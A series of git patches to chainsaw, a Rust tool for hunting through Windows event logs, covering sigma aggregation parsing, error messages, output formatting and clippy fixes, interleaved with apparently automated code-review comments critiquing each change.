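Review bot: `fields` ends up holding both the `count(...)` argument and the `by` field, and the hunter (hunk `@@ -453,11 +454,37` in src/hunt.rs, this commit) hashes all of `aggregate.fields` into a single grouping key and compares `ids.len()` with the threshold, so `count(dst) by src > 10` counts events per (dst, src) pair rather than distinct `dst` values per `src`, which is what the sigma aggregation expression means. A rule written that way will fire on any pair repeated more than ten times and miss the many-distinct-values case it was written for. Either keep the counted field apart from the grouping fields (`count_field: Option<String>, group_by: Vec<String>`) and count distinct values in the hunter, or reject a non-empty `count(...)` argument for now with a comment such as `// NOTE: only count() without a field is supported; count(field) needs distinct-value counting`. Tokens after `value` are also accepted silently.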
@@ -433,7 +504,9 @@ fn detections_to_tau(detection: Detection) -> Result { None => bail!("identifiers must be strings"), }; if k == "timeframe" { - bail!("timeframe based rules cannot be converted"); + // TODO: Ignore for now as this would make the aggregator more complex... + continue; + //bail!("timeframe based rules cannot be converted"); } let mut multi = false; let blocks = match v { @@ -547,7 +620,7 @@ pub fn load(rule: &Path) -> Result> { if main.header.and_then(|m| m.action).is_some() { for sigma in sigma.into_iter() { if let Some(extension) = sigma.detection { - let detection = match &main.detection { + let (detection, agg) = match &main.detection { Some(d) => prepare(d.clone(), Some(extension)), None => prepare(extension, None), }?; @@ -559,6 +632,9 @@ pub fn load(rule: &Path) -> Result> { for (k, v) in tau { rule.insert(k, v); } + if let Some(agg) = agg.and_then(|a| serde_yaml::to_value(a).ok()) { + rule.insert(Yaml::String("aggregate".to_owned()), agg); + } rules.push(rule.into()); } else { single = true; @@ -571,7 +647,7 @@ pub fn load(rule: &Path) -> Result> { if single { let mut rule = base; if let Some(detection) = main.detection { - let detection = prepare(detection, None)?; + let (detection, agg) = prepare(detection, None)?; let tau = detections_to_tau(detection)?; if let Some(level) = main.level { rule.insert("level".into(), level.into()); @@ -579,6 +655,9 @@ pub fn load(rule: &Path) -> Result> { for (k, v) in tau { rule.insert(k, v); } + if let Some(agg) = agg.and_then(|a| serde_yaml::to_value(a).ok()) { + rule.insert(Yaml::String("aggregate".to_owned()), agg); + } rules.push(rule.into()); } } From 56f06d43f228f67c3fbb8c7d7dee25a5f8c5da9c Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Sat, 18 Jun 2022 11:38:24 +0100 Subject: [PATCH 25/77] build: bump to v2.0.0-alpha.4 --- Cargo.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Cargo.toml b/Cargo.toml index 83623c75..fd5be64f 100644 --- a/Cargo.toml +++ b/Cargo.toml 
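Review bot: Dropping `timeframe` with a bare `continue` changes the meaning of every aggregating sigma rule without telling anyone: a `count() by X > N` rule written for a five-minute window now fires whenever N events appear anywhere in the input, because the hunter groups over the whole file. Until windows are implemented the loader should surface this once per rule (a warning alongside the `continue`) and the comment should state the effect rather than just the deferral, e.g. `// TODO: timeframe is not enforced yet; aggregations count over the whole input`. The commented-out `//bail!(...)` line should be removed rather than kept as dead code.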
@@ -1,6 +1,6 @@ [package] name = "chainsaw" -version = "2.0.0-alpha.3" +version = "2.0.0-alpha.4" repository = "https://github.com/countercept/chainsaw" description = "Rapidly Search and Hunt Through Windows Event Logs" authors = ["James Dorgan ","Alex Kornitzer "] From b465affc574d743d1ee92a390b8f5d1e013faadd Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 18:13:48 +0100 Subject: [PATCH 26/77] various fixes --- src/cli.rs | 12 +++++++++++- src/main.rs | 21 +++++++++++++++++---- src/rule/mod.rs | 11 ++++++++++- 3 files changed, 38 insertions(+), 6 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 0c678510..776e5ee4 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -75,6 +75,14 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String data } +fn format_time(event_time: String) -> String { + let chunks = event_time.rsplit('.').last(); + match chunks { + Some(e) => e.replace("T", " ").replace('"', ""), + None => event_time, + } +} + pub struct Grouping<'a> { hits: Vec>, kind: &'a Kind, @@ -183,7 +191,7 @@ pub fn print_detections( table.add_row(Row::new(cells)); for grouping in group { - let localised = if let Some(timezone) = timezone { + let mut localised = if let Some(timezone) = timezone { timezone .from_local_datetime(grouping.timestamp) .single() @@ -198,6 +206,8 @@ pub fn print_detections( DateTime::::from_utc(*grouping.timestamp, Utc).to_rfc3339() }; + localised = format_time(localised); + // NOTE: Currently we don't do any fancy outputting for aggregates so we can cut some // corners here! let count; diff --git a/src/main.rs b/src/main.rs index decb8087..a1398bfd 100644 --- a/src/main.rs +++ b/src/main.rs 
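Review bot: `format_time` drops everything after the first `.` (`rsplit('.').last()` is the segment before the first dot), so a timestamp with fractional seconds such as `2022-06-20T18:13:48.123+01:00` loses both the fraction and the `+01:00` offset, while one without a fraction keeps its offset, and the table shows differently shaped times from one event to the next. Since `localised` is built from a chrono `DateTime` a few lines up in `print_detections` (hunk `@@ -198,6 +206,8`), formatting there with `.format("%Y-%m-%d %H:%M:%S").to_string()` (or `%H:%M:%S%.3f` if sub-second precision matters for a timeline) gives a uniform result and removes the string surgery; the `.replace('"', "")` looks like a leftover, as `to_rfc3339()` never produces quotes.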
@@ -40,7 +40,7 @@ enum Command { #[structopt(short = "m", long = "mapping", number_of_values = 1)] mapping: Option>, /// Additional rules to hunt with. - #[structopt(short = "r", long = "rule", number_of_values = 1, requires("mapping"))] + #[structopt(short = "r", long = "rule", number_of_values = 1)] rule: Option>, /// Set the column width for the tabular output. @@ -236,23 +236,35 @@ fn run() -> Result<()> { if let Some(rule) = rule { rules.extend(rule) }; - cs_eprintln!("[+] Loading rules..."); + cs_eprintln!("[+] Loading detection rules from: {:?}", rules); let mut failed = 0; let mut count = 0; let mut rs = vec![]; for path in &rules { for file in get_files(path, &None, skip_errors)? { - match load_rule(&file) { + match load_rule(&file, &mapping.is_some()) { Ok(mut r) => { count += 1; rs.append(&mut r) } - Err(_) => { + Err(e) => { + // Hacky way of exposing rule types from load_rule function + if e.to_string() == "sigma-no-mapping" { + return Err(anyhow::anyhow!( + "No mapping file specified for provided Sigma rules, specify one with the '-m' flag", + )); + } failed += 1; } } } } + cs_eprintln!("[+] Loading event logs from: {:?}", path); + if count == 0 { + return Err(anyhow::anyhow!( + "No valid detection rules were found in the provided paths", + )); + } if failed > 0 { cs_eprintln!( "[+] Loaded {} detection rules ({} were not loaded)", @@ -262,6 +274,7 @@ fn run() -> Result<()> { } else { cs_eprintln!("[+] Loaded {} detection rules", count); } + let rules = rs; let mut hunter = Hunter::builder() .rules(rules) diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 2afbb2f8..b594f68b 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs 
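Review bot: The sigma-without-mapping case is detected by `e.to_string() == "sigma-no-mapping"`, a sentinel that `load_rule` raises with `anyhow::bail!` (hunk `@@ -47,12 +47,13` in src/rule/mod.rs, this commit); any later change to that text, or an added `.context(...)`, breaks the comparison silently and the user is left with an unexplained `failed += 1`. A small error enum (say `LoadError`) returned through `anyhow` and matched with `e.downcast_ref::<LoadError>()` is the idiomatic replacement and removes both "Hacky way" comments. The `Err(e)` arm also discards `e` for every other failure, so "N were not loaded" gives no reason; printing it under `skip_errors` or a verbose flag would help. In the same mod.rs hunk `mapping: &bool` should be `mapping: bool`, and `rules.len() == 0` reads better as `rules.is_empty()`.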
@@ -47,12 +47,13 @@ pub struct Rule { pub kind: Kind, } -pub fn load_rule(path: &Path) -> crate::Result> { +pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { if let Some(x) = path.extension() { if x != "yml" && x != "yaml" { anyhow::bail!("rule must have a yaml file extension"); } } + // This is a bit crude but we try all formats then report the errors... let rules = if let Ok(rule) = chainsaw::load(path) { vec![Rule { @@ -60,6 +61,10 @@ pub fn load_rule(path: &Path) -> crate::Result> { kind: Kind::Chainsaw, }] } else if let Ok(rules) = sigma::load(path) { + if !mapping { + // Hacky way of exposing rule types from load_rule function + anyhow::bail!("sigma-no-mapping"); + } rules .into_iter() .filter_map(|r| serde_yaml::from_value(r).ok()) @@ -132,6 +137,10 @@ pub fn load_rule(path: &Path) -> crate::Result> { } else { anyhow::bail!("failed to load rule, run the linter for more information"); }; + + if rules.len() == 0 { + anyhow::bail!("No valid rules could be loaded from the file"); + } Ok(rules) } From 01deb40958bde66e9179fe3888a8ec31c5b0095c Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 18:29:51 +0100 Subject: [PATCH 27/77] split detection name if long --- src/cli.rs | 19 +++++++++++++++++-- 1 file changed, 17 insertions(+), 2 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 776e5ee4..1e3f43cb 100644 --- a/src/cli.rs +++ b/src/cli.rs @@ -75,6 +75,21 @@ pub fn format_field_length(data: &str, full_output: bool, length: u32) -> String data } +fn split_tag(tag_name: &str) -> String { + let mut count = 0; + let mut chars = Vec::with_capacity(tag_name.len()); + for char in tag_name.chars() { + count += 1; + if count > 20 && char.is_whitespace() { + count = 0; + chars.push('\n'); + } else { + chars.push(char); + } + } + chars.into_iter().collect() +} + fn format_time(event_time: String) -> String { let chunks = event_time.rsplit('.').last(); match chunks { 
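Review bot: `load_rule` now takes `mapping: &bool`, but a reference to a `bool` buys nothing over the value (clippy's `trivially_copy_pass_by_ref` flags this), so `pub fn load_rule(path: &Path, mapping: bool)` with `load_rule(&file, mapping.is_some())` at the call site reads better. In the cli.rs hunk, `split_tag` wraps at the first whitespace after 20 characters with no explanation of the limit; a comment such as `// Wrap long rule names at the first space past 20 chars so the table column stays narrow` and a named constant for `20` would help the next reader. `load_rule`'s body continues past the first hunk.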
@@ -304,7 +319,7 @@ pub fn print_detections( ])); for rule in &rules { table.add_row(Row::new(vec![ - cell!(rule.name), + cell!(split_tag(&rule.name)), cell!(rule.authors.join("\n")), cell!(rule.level), cell!(rule.status), @@ -314,7 +329,7 @@ pub fn print_detections( } else { cells.push(cell!(rules .iter() - .map(|rule| format!("{} {}", RULE_PREFIX, rule.name)) + .map(|rule| format!("{} {}", RULE_PREFIX, split_tag(&rule.name))) .collect::>() .join("\n"))); } From efac8696324ab35c02fb84314b918dc747928953 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 20:44:55 +0100 Subject: [PATCH 28/77] add total evtx files loaded message --- src/main.rs | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/src/main.rs b/src/main.rs index a1398bfd..6ee8913b 100644 --- a/src/main.rs +++ b/src/main.rs @@ -236,6 +236,7 @@ fn run() -> Result<()> { if let Some(rule) = rule { rules.extend(rule) }; + cs_eprintln!("[+] Loading event logs from: {:?}", path); cs_eprintln!("[+] Loading detection rules from: {:?}", rules); let mut failed = 0; let mut count = 0; @@ -259,7 +260,6 @@ fn run() -> Result<()> { } } } - cs_eprintln!("[+] Loading event logs from: {:?}", path); if count == 0 { return Err(anyhow::anyhow!( "No valid detection rules were found in the provided paths", @@ -300,6 +300,8 @@ fn run() -> Result<()> { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); + } else { + cs_eprintln!("[+] Loaded {} EVTX files", files.len(),); } let mut detections = vec![]; let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); From 35dd50cfbd2709819b54d0c37383564637d472ba Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 21:05:48 +0100 Subject: [PATCH 29/77] handle error where mapping file does not exist --- src/hunt.rs | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/src/hunt.rs b/src/hunt.rs index ab28ae03..c40c4efc 100644 --- a/src/hunt.rs +++ b/src/hunt.rs 
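Review bot: In the main.rs `@@ -300` hunk the new `else` branch follows an unconditional `return Err(...)`, so it can be a plain statement after the `if`, and the trailing comma in `files.len(),` is a stray leftover: `cs_eprintln!("[+] Loaded {} EVTX files", files.len());`. Moving the `Loading event logs from:` line above the rule loading also means it is printed before any rule errors, which is fine but worth keeping in mind when reading the later size-reporting change. `run()` starts and ends outside the hunks.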
@@ -120,7 +120,10 @@ impl HunterBuilder { if let Some(mut mappings) = self.mappings { mappings.sort(); for mapping in mappings { - let mut file = fs::File::open(mapping)?; + let mut file = match fs::File::open(mapping) { + Ok(a) => a, + Err(e) => anyhow::bail!("Error loading mapping file - {}", e), + }; let mut content = String::new(); file.read_to_string(&mut content)?; let mut mapping: Mapping = serde_yaml::from_str(&content)?; From 5f0748502ab364c13bcfd70133098d509430bc2f Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 21:10:31 +0100 Subject: [PATCH 30/77] handle error where mapping file is not valid --- src/hunt.rs | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/src/hunt.rs b/src/hunt.rs index c40c4efc..73f8eea4 100644 --- a/src/hunt.rs +++ b/src/hunt.rs @@ -122,11 +122,14 @@ impl HunterBuilder { for mapping in mappings { let mut file = match fs::File::open(mapping) { Ok(a) => a, - Err(e) => anyhow::bail!("Error loading mapping file - {}", e), + Err(e) => anyhow::bail!("Error loading specified mapping file - {}", e), }; let mut content = String::new(); file.read_to_string(&mut content)?; - let mut mapping: Mapping = serde_yaml::from_str(&content)?; + let mut mapping: Mapping = match serde_yaml::from_str(&content) { + Ok(a) => a, + Err(e) => anyhow::bail!("Provided mapping file is invalid - {}", e), + }; mapping.groups.sort_by(|x, y| x.name.cmp(&y.name)); for group in mapping.groups { let mapper = Mapper::from(group.fields); From 4543b73c99d6f72bd5c5c227ec6935e67ca418e4 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 21:23:30 +0100 Subject: [PATCH 31/77] add total evtx files loaded message to search --- src/main.rs | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/src/main.rs b/src/main.rs index 6ee8913b..a6c343da 100644 --- a/src/main.rs +++ b/src/main.rs 
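Review bot: Both new `match` arms in the `HunterBuilder` hunks report the I/O or YAML error but not which mapping file produced it, so with several `-m` paths the user still cannot tell which one failed; borrowing the path and including it, e.g. `match fs::File::open(&mapping) { ... Err(e) => anyhow::bail!("Error loading specified mapping file {} - {}", mapping.display(), e) }`, would fix that (assuming `mapping` is a `PathBuf`, as the `File::open` call suggests). The `file.read_to_string(&mut content)?` between them still bails with the bare OS error, so the three failure points of the same loop are handled inconsistently. Since the crate already uses `anyhow`, `.with_context(|| ...)?` on each call would give the same messages without the explicit matches. The enclosing method starts and ends outside the hunks.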
@@ -400,8 +400,10 @@ fn run() -> Result<()> { } if files.len() == 0 { return Err(anyhow::anyhow!( - "No event logs were found in the provided paths" + "No event logs were found in the provided paths", )); + } else { + cs_eprintln!("[+] Loaded {} EVTX files", files.len(),); } let mut searcher = Searcher::builder() .ignore_case(ignore_case) From cc9bc3bcd13dcf57e64a526331f27b4e51097773 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 21:30:40 +0100 Subject: [PATCH 32/77] add error message when EVTX path is invalid --- src/file/mod.rs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/file/mod.rs b/src/file/mod.rs index c05621e2..c0245a60 100644 --- a/src/file/mod.rs +++ b/src/file/mod.rs @@ -213,7 +213,7 @@ pub fn get_files( files.push(path.to_path_buf()); } } else { - anyhow::bail!("Invalid input path: {}", path.display()); + anyhow::bail!("Specified event log path is invalid - {}", path.display()); } Ok(files) } From 4781c6202edde3d41e543887e0208adf469c642a Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 23:27:19 +0100 Subject: [PATCH 33/77] adding output message to state total size of loaded ETVX files --- Cargo.toml | 1 + src/main.rs | 24 +++++++++++++++++++----- 2 files changed, 20 insertions(+), 5 deletions(-) diff --git a/Cargo.toml b/Cargo.toml index 83623c75..1d420bdc 100644 --- a/Cargo.toml +++ b/Cargo.toml @@ -12,6 +12,7 @@ edition = "2021" [dependencies] aho-corasick = "0.7" anyhow = "1.0" +bytesize = "1.0" chrono = "0.4" chrono-tz = { version = "0.4", features = ["serde"] } colour = "0.6" diff --git a/src/main.rs b/src/main.rs index a6c343da..d9dd221f 100644 --- a/src/main.rs +++ b/src/main.rs @@ -1,12 +1,15 @@ #[macro_use] extern crate chainsaw; +extern crate bytesize; use std::fs::File; use std::path::PathBuf; use anyhow::Result; +use bytesize::ByteSize; use chrono::NaiveDateTime; use chrono_tz::Tz; + use structopt::StructOpt; use chainsaw::{ 
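Review bot: `extern crate bytesize;` in the main.rs import hunk is redundant: the Cargo.toml context shows `edition = "2021"`, where `use bytesize::ByteSize;` alone brings the crate into scope, so that line and the stray blank line added before `use structopt::StructOpt;` can be dropped. The diffstat for this patch lists only Cargo.toml and main.rs, so the Cargo.lock entry for the new `bytesize = "1.0"` dependency presumably lands in a later commit; keeping the lockfile in the same change makes the build reproducible from this commit on its own.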
@@ -267,7 +270,7 @@ fn run() -> Result<()> { } if failed > 0 { cs_eprintln!( - "[+] Loaded {} detection rules ({} were not loaded)", + "[+] Loaded {} detection rules ({} not loaded)", count, failed ); @@ -293,15 +296,20 @@ fn run() -> Result<()> { } let hunter = hunter.build()?; let mut files = vec![]; + let mut size = ByteSize::mb(0); for path in &path { - files.extend(get_files(path, &extension, skip_errors)?); + let res = get_files(path, &extension, skip_errors)?; + for i in &res { + size += i.metadata()?.len(); + } + files.extend(res); } if files.len() == 0 { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); } else { - cs_eprintln!("[+] Loaded {} EVTX files", files.len(),); + cs_eprintln!("[+] Loaded {} EVTX files ({})", files.len(), size); } let mut detections = vec![]; let pb = cli::init_progress_bar(files.len() as u64, "Hunting".to_string()); @@ -395,15 +403,21 @@ fn run() -> Result<()> { ); } let mut files = vec![]; + let mut size = ByteSize::mb(0); for path in &paths { - files.extend(get_files(path, &extension, skip_errors)?); + let res = get_files(path, &extension, skip_errors)?; + for i in &res { + size += i.metadata()?.len(); + } + files.extend(res); } + if files.len() == 0 { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); } else { - cs_eprintln!("[+] Loaded {} EVTX files", files.len(),); + cs_eprintln!("[+] Loaded {} EVTX files ({})", files.len(), size); } let mut searcher = Searcher::builder() .ignore_case(ignore_case) From 0afe74409cef45c894470740fe40be63c0ae2d22 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Mon, 20 Jun 2022 23:31:54 +0100 Subject: [PATCH 34/77] fix: clippy warnings --- src/cli.rs | 2 +- src/ext/tau.rs | 6 +++--- src/main.rs | 4 ++-- src/rule/mod.rs | 2 +- 4 files changed, 7 insertions(+), 7 deletions(-) diff --git a/src/cli.rs b/src/cli.rs index 1e3f43cb..4c14fbf8 100644 --- a/src/cli.rs +++ b/src/cli.rs 
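Review bot: `size += i.metadata()?.len();` in both the `@@ -293` and `@@ -395` hunks aborts the whole run if a single listed file cannot be stat'ed (removed between listing and here, unreadable, dangling symlink), and it does so with a bare OS error that names no path, ignoring the `skip_errors` flag that `get_files` honours for the same paths. Treating a metadata failure like the other skippable errors, or at least attaching the path with `.with_context(|| format!("could not stat {}", i.display()))?`, would keep behaviour consistent. The listing-plus-size loop is also duplicated verbatim between the hunt and search branches; a private helper returning `(Vec<PathBuf>, ByteSize)` for a slice of paths would remove the copy. `ByteSize::b(0)` states the starting value more directly than `ByteSize::mb(0)`. `run()` starts and ends outside the hunks.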
@@ -93,7 +93,7 @@ fn split_tag(tag_name: &str) -> String { fn format_time(event_time: String) -> String { let chunks = event_time.rsplit('.').last(); match chunks { - Some(e) => e.replace("T", " ").replace('"', ""), + Some(e) => e.replace('T', " ").replace('"', ""), None => event_time, } } diff --git a/src/ext/tau.rs b/src/ext/tau.rs index f98467ff..9dbd5a06 100644 --- a/src/ext/tau.rs +++ b/src/ext/tau.rs @@ -39,14 +39,14 @@ pub fn parse_kv(kv: &str) -> crate::Result { let value = parts.next().expect("invalid tau key value pair"); let mut cast = false; let mut not = false; - let (field, key) = if key.starts_with("int(") && key.ends_with(")") { + let (field, key) = if key.starts_with("int(") && key.ends_with(')') { let key = key[4..key.len() - 1].to_owned(); (Expression::Cast(key.to_owned(), MiscSym::Int), key) - } else if key.starts_with("not(") && key.ends_with(")") { + } else if key.starts_with("not(") && key.ends_with(')') { not = true; let key = key[4..key.len() - 1].to_owned(); (Expression::Field(key.to_owned()), key) - } else if key.starts_with("str(") && key.ends_with(")") { + } else if key.starts_with("str(") && key.ends_with(')') { cast = true; let key = key[4..key.len() - 1].to_owned(); (Expression::Cast(key.to_owned(), MiscSym::Str), key) diff --git a/src/main.rs b/src/main.rs index d9dd221f..53d95b77 100644 --- a/src/main.rs +++ b/src/main.rs @@ -304,7 +304,7 @@ fn run() -> Result<()> { } files.extend(res); } - if files.len() == 0 { + if files.is_empty() { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); @@ -412,7 +412,7 @@ fn run() -> Result<()> { files.extend(res); } - if files.len() == 0 { + if files.is_empty() { return Err(anyhow::anyhow!( "No event logs were found in the provided paths", )); diff --git a/src/rule/mod.rs b/src/rule/mod.rs index b594f68b..358f6df1 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs 
@@ -138,7 +138,7 @@ pub fn load_rule(path: &Path, mapping: &bool) -> crate::Result> { anyhow::bail!("failed to load rule, run the linter for more information"); }; - if rules.len() == 0 { + if rules.is_empty() { anyhow::bail!("No valid rules could be loaded from the file"); } Ok(rules) From e24031943221a87e367c9d9a2a1714b28e8282f6 Mon Sep 17 00:00:00 2001 From: Alex Kornitzer Date: Tue, 21 Jun 2022 11:47:57 +0100 Subject: [PATCH 35/77] fix: sigma parsing was broken due to a misunderstanding This is a long standing bug where a condition that should be treated as an 'and' was treated as an 'or'. Along with other improvements this should now be fixed. --- Cargo.lock | 6 +- src/main.rs | 10 +- src/rule/mod.rs | 48 +-- src/rule/sigma.rs | 744 +++++++++++++++++++++++++--------------------- 4 files changed, 444 insertions(+), 364 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 507b9d06..69e397b1 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -156,7 +156,7 @@ checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "chainsaw" -version = "2.0.0-alpha.3" +version = "2.0.0-alpha.4" dependencies = [ "aho-corasick 0.7.18", "anyhow", @@ -1186,9 +1186,9 @@ dependencies = [ [[package]] name = "tau-engine" -version = "1.7.0" +version = "1.7.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28a9cf722f2c09f4a81b8367b0329a36067e845904e19ccee432b204ab96d191" +checksum = "7e0f34a4bc11778eb6faed8506f40bad0b1fb323b2538152c2e487b1b9b75b61" dependencies = [ "aho-corasick 0.7.18", "lazy_static", diff --git a/src/main.rs b/src/main.rs index 658e2ebb..def62e0f 100644 --- a/src/main.rs +++ b/src/main.rs 
@@ -353,7 +353,15 @@ fn run() -> Result<()> { } Err(e) => { failed += 1; - cs_eprintln!("[!] {}", e); + let file_name = match file + .display() + .to_string() + .strip_prefix(&path.display().to_string()) + { + Some(e) => e.to_string(), + None => file.display().to_string(), + }; + cs_eprintln!("[!] {}: {}", file_name, e); continue; } } diff --git a/src/rule/mod.rs b/src/rule/mod.rs index 377492e0..90370378 100644 --- a/src/rule/mod.rs +++ b/src/rule/mod.rs @@ -71,9 +71,18 @@ pub fn load_rule(path: &Path) -> crate::Result> { kind: Kind::Chainsaw, }] } else if let Ok(rules) = sigma::load(path) { - rules + let sigma = match rules + .into_iter() + .map(|y| serde_yaml::from_value::(y)) + .collect::, _>>() + { + Ok(rules) => rules, + Err(_) => { + anyhow::bail!("failed to load rule, run the linter for more information"); + } + }; + sigma .into_iter() - .filter_map(|r| serde_yaml::from_value(r).ok()) .map(|rule: Sigma| Rule { chainsaw: Chainsaw { name: rule.name, 
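Review bot: The prefix stripping in the `@@ -353` hunk round-trips both paths through `display().to_string()` and then works on text, which leaves a leading separator behind (`dir/x.evtx` minus `dir` is `/x.evtx`) and is lossy for non-UTF-8 paths; `Path::strip_prefix` works on components and handles both: `let file_name = file.strip_prefix(path).unwrap_or(file.as_path());` followed by `cs_eprintln!("[!] {}: {}", file_name.display(), e);`. In the rule/mod.rs hunk, `Err(_) => { anyhow::bail!("failed to load rule, ...") }` discards the `serde_yaml` error, so a rule that fails to deserialise gives no hint which field is wrong unless the user reruns the linter; attaching it with `.context(...)` costs nothing. `run()` and `load_rule` both continue outside their hunks.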
@@ -161,28 +170,25 @@ pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { vec![rule.filter] } Err(e) => { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - anyhow::bail!("{:?}: {}", file_name, e); + anyhow::bail!("{}", e); } }, Kind::Sigma => match sigma::load(path) { - Ok(yamls) => yamls - .into_iter() - .filter_map(|y| serde_yaml::from_value::(y).ok()) - .map(|r| Filter::Detection(r.tau.detection)) - .collect(), + Ok(yamls) => { + let sigma = yamls + .into_iter() + .map(|y| serde_yaml::from_value::(y)) + .collect::, _>>()?; + sigma + .into_iter() + .map(|r| Filter::Detection(r.tau.detection)) + .collect() + } Err(e) => { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; if let Some(source) = e.source() { - anyhow::bail!("{:?}: {} - {}", file_name, e, source); + anyhow::bail!("{} - {}", e, source); } else { - anyhow::bail!("{:?}: {}", file_name, e); + anyhow::bail!("{}", e); } } }, @@ -191,11 +197,7 @@ pub fn lint_rule(kind: &Kind, path: &Path) -> crate::Result> { vec![Filter::Detection(rule.tau.detection)] } Err(e) => { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - anyhow::bail!("{:?}: {}", file_name, e); + anyhow::bail!("{}", e); } }, }; diff --git a/src/rule/sigma.rs b/src/rule/sigma.rs index c51ee736..01080a02 100644 --- a/src/rule/sigma.rs +++ b/src/rule/sigma.rs @@ -1,4 +1,4 @@ -use std::collections::HashSet; +use std::collections::{HashMap, HashSet}; use std::fs::File; use std::io::prelude::*; use std::path::Path; 
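Review bot: In the Sigma arm of `lint_rule` the new `.collect::<Result<Vec<_>, _>>()?` propagates a raw `serde_yaml::Error`, while the sibling arms of the same `match` format theirs with `bail!("{}", e)` and the `Err(e)` arm directly below still appends `e.source()`, so the three failure paths now render differently in linter output. Mapping the serde error through the same `bail!` form, or `.context("failed to deserialise sigma rule")?` given the crate uses anyhow, would keep the messages uniform. The removed `file_name` prefix appears to be reinstated by the caller in the main.rs hunk of this patch, which is a better place for it; a short comment on `lint_rule` noting that errors are returned without the path would stop someone re-adding it here. `lint_rule` starts before the hunk.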
@@ -226,6 +226,61 @@ fn parse_identifier(value: &Yaml, modifiers: &HashSet) -> Result { Ok(v) } +fn prepare_condition(condition: &str) -> Result<(String, Option)> { + if condition.contains(" | ") { + let (condition, agg) = condition + .split_once(" | ") + .expect("could not split condition"); + let mut parts = agg.split_whitespace(); + let mut fields = vec![]; + // NOTE: We only support count atm... + // agg-function(agg-field) [ by group-field ] comparison-op value + if let Some(kind) = parts.next() { + if let Some(rest) = kind.strip_prefix("count(") { + if let Some(field) = rest.strip_suffix(")") { + if !field.is_empty() { + fields.push(field.to_owned()); + } + } else { + anyhow::bail!("invalid agg function"); + } + } else { + anyhow::bail!("unsupported agg function - {}", kind); + } + } else { + anyhow::bail!("missing agg function"); + } + let mut part = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + if part == "by" { + let field = match parts.next() { + Some(field) => field, + None => anyhow::bail!("missing group field"), + }; + fields.push(field.to_owned()); + part = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + } + let number = match parts.next() { + Some(part) => part, + None => anyhow::bail!("invalid aggregation"), + }; + Ok(( + condition.to_owned(), + Some(Aggregate { + count: format!("{}{}", part, number), + fields, + }), + )) + } else { + Ok((condition.to_owned(), None)) + } +} + fn prepare( detection: Detection, extra: Option, 
@@ -237,217 +292,77 @@ fn prepare( .and_then(|e| e.condition.clone()) .or_else(|| detection.condition.clone()); if let Some(c) = &condition { - if c == "all of them" { - let mut scratch = Sequence::new(); - for (_, v) in &detection.identifiers { - scratch.push(v.clone()); - } - if let Some(d) = extra { - for (_, v) in d.identifiers { - scratch.push(v); - } - } - let mut identifiers = Mapping::new(); - identifiers.insert("A".into(), scratch.into()); - detection = Detection { - condition: Some("all(A)".into()), - identifiers, - } - } else if c == "1 of them" { - let mut scratch = Sequence::new(); - for (_, v) in &detection.identifiers { - scratch.push(v.clone()); - } - if let Some(d) = extra { - for (_, v) in d.identifiers { - scratch.push(v); - } - } - let mut identifiers = Mapping::new(); - identifiers.insert("A".into(), scratch.into()); - detection = Detection { - condition: Some("of(A, 1)".into()), - identifiers, - } - } else { - let condition = match c { - Yaml::String(c) => c, - Yaml::Sequence(s) => { - if s.len() == 1 { - let x = s.iter().next().expect("could not get condition"); - if let Yaml::String(c) = x { - c - } else { - anyhow::bail!("condition must be a string"); - } + let mut conditions = vec![]; + match c { + Yaml::String(c) => conditions.push(c), + Yaml::Sequence(s) => { + if s.len() == 1 { + let x = s.iter().next().expect("could not get condition"); + if let Yaml::String(c) = x { + conditions.push(c) } else { anyhow::bail!("condition must be a string"); } - } - _ => anyhow::bail!("condition must be a string"), - }; - let condition = if condition.contains(" | ") { - let (condition, agg) = condition - .split_once(" | ") - .expect("could not split condition"); - let mut parts = agg.split_whitespace(); - let mut fields = vec![]; - // NOTE: We only support count atm... 
